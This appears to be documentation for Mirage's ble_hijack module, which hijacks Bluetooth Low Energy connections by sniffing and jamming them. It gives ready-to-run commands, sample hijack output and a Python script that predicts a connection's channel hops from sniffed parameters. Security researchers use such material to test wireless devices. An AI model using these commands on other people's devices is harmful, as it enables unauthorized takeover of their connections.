ble_hijack

Presentation

ble_hijack implements the active attack provided by BTLEJack: it makes it possible to hijack a specific connection. This attack sniffs an established connection, synchronizes to it and jams the packets emitted by the slave. As a consequence, if the master reaches its timeout value, it disconnects from the slave device and the attacker is able to communicate with the slave device in its place. This module can hijack a new connection (by setting the input parameter HIJACKING_MODE to “newConnections”) or an established connection (by setting the input parameter HIJACKING_MODE to “existingConnections”). Some additional parameters can be provided to help the module find the right target (TARGET for a new connection; ACCESS_ADDRESS, CRC_INIT and CHANNEL_MAP for an existing connection). This module needs ble_sniff and cannot be used alone. Indeed, once the connection is hijacked, the module terminates its execution, allowing another module, such as ble_master or ble_discover, to run. It can be used similarly to the module ble_connect.

Warning

This attack is sometimes unstable, and may require multiple attempts. This module is experimental and is only provided as a proof of concept.

Compatible devices

Input parameters

Name            | Default value  | Possible values                    | Description
----------------|----------------|------------------------------------|------------------------------------------
INTERFACE       | microbit0      | microbitX                          | Primary interface to use
INTERFACEA      |                | microbitX                          | Optional additional interface
INTERFACEB      |                | microbitX                          | Optional additional interface
TARGET          |                | <BD address>                       | Target address
CHANNEL         | 37             | 37|38|39                           | Communication channel to observe
HIJACKING_MODE  | newConnections | newConnections|existingConnections | Hijacking strategy
ACCESS_ADDRESS  |                | 0xYYYY                             | Access address for an existing connection
CRC_INIT        |                | 0xYYYYYY                           | CRCInit for an existing connection
CHANNEL_MAP     |                | 0xYYYYYYYYYY                       | Channel Map for an existing connection

Output parameters

Name       | Possible values | Description
-----------|-----------------|------------------------
INTERFACE  | microbitX       | Primary interface used

Usage

Hijacking a new connection

If you want to hijack a new connection, set “newConnections” as the value of the input parameter HIJACKING_MODE:

$ sudo mirage "ble_hijack|ble_master" ble_hijack1.HIJACKING_MODE=newConnections
[INFO] Module ble_hijack loaded !
[INFO] Module ble_master loaded !
[SUCCESS] BTLEJack device #0 successfully instantiated (firmware version : 3.14)
[INFO] Custom Mirage Firmware used ! Advertisements sniffing and jamming will be supported.
┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0x88262126     │ 0xe12e70 │ 0x1e007fffff │ 36           │ 6             │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[INFO] Recovering Hop Interval ...
[SUCCESS] Hop Interval successfully recovered : 36
[INFO] Recovering Hop Increment ...
[SUCCESS] Hop Increment successfully recovered : 6
[INFO] All parameters recovered, following connection ...
┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0x88262126     │ 0xe12e70 │ 0x1e007fffff │ 36           │ 6             │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[INFO] Hijacking in progress ...
[MASTER|0x88262126]:

Then, you can use the ble_master, exactly as if you used it alone or with ble_connect.
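The "following connection" step in the output above relies on the fact that, once the access address, CRCInit, channel map, hop interval and hop increment are known, the channel sequence of a BLE 4.x connection is fully determined by the standard Channel Selection Algorithm #1. The script below is an added illustration (not Mirage or BTLEJack code) that applies that algorithm to the values recovered in the Sniffed Connection table above; the starting value of 0 for the last unmapped channel is the specification default at connection setup.

```python
"""Channel Selection Algorithm #1 (Bluetooth Core Spec, Link Layer) applied to
the connection parameters shown in the ble_hijack output on this page.
Added example, not part of Mirage or BTLEJack."""

DATA_CHANNELS = 37  # BLE data channels 0..36 (37-39 are advertising channels)


def used_channels(channel_map):
    """Decode a 37-bit channel map: bit i set => data channel i is in use."""
    return [ch for ch in range(DATA_CHANNELS) if channel_map >> ch & 1]


def hop_sequence(channel_map, hop_increment, count, last_unmapped=0):
    """Return the next `count` data channels the connection will use.

    `last_unmapped` is 0 right after connection setup, so a third party that
    knows the other parameters can predict every following channel.
    """
    used = used_channels(channel_map)
    if not (5 <= hop_increment <= 16) or not used:
        raise ValueError("invalid hop increment or empty channel map")
    sequence = []
    for _ in range(count):
        last_unmapped = (last_unmapped + hop_increment) % DATA_CHANNELS
        if channel_map >> last_unmapped & 1:
            sequence.append(last_unmapped)          # channel in use: take it as-is
        else:
            # remapping: index into the list of used channels
            sequence.append(used[last_unmapped % len(used)])
    return sequence


def connection_interval_ms(hop_interval):
    """The hop interval is expressed in units of 1.25 ms."""
    return hop_interval * 1.25


if __name__ == "__main__":
    # Values copied from the "Sniffed Connection" table on this page
    CHANNEL_MAP = 0x1E007FFFFF
    HOP_INCREMENT = 6
    HOP_INTERVAL = 36
    print(len(used_channels(CHANNEL_MAP)), "data channels in use")
    print("next channels:", hop_sequence(CHANNEL_MAP, HOP_INCREMENT, 10))
    print(connection_interval_ms(HOP_INTERVAL), "ms between connection events")
```

With the page's channel map, channels 23 to 32 are unused, which is why the sequence jumps to a remapped channel whenever the unmapped value lands there.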

Hijacking an existing connection

Similarly, if you want to hijack an existing connection, set “existingConnections” as the value of the input parameter HIJACKING_MODE:

$ sudo mirage "ble_hijack|ble_master" ble_hijack1.HIJACKING_MODE=existingConnections

Then, the execution is quite similar to the one described above.